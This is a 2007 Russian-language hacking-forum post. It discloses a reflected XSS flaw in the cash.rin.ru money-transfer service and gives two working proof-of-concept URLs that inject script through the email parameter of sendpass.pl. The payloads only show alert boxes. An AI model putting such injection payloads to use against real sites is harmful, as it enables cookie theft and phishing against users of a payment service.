20.05.2007, 00:45
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Ca$hed ---- ОЧЕРЕДНАЯ БАГА В Rin СЕРВИСИ
Вот и XSS опять нашел в rin ---> cash.rin.ru
Пример1:
Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%20%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('Ca$hed%20by%20fLy')%3B%3C/ScRiPt%3E&a=send&l=1
Пример2:
Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%22+onmouseover=%22alert('Ca$hed%20by%20fLy')&a=send&l=1
А пишут , что CASH TRANSFER----надежный перевод ваших средств!!! |
|
|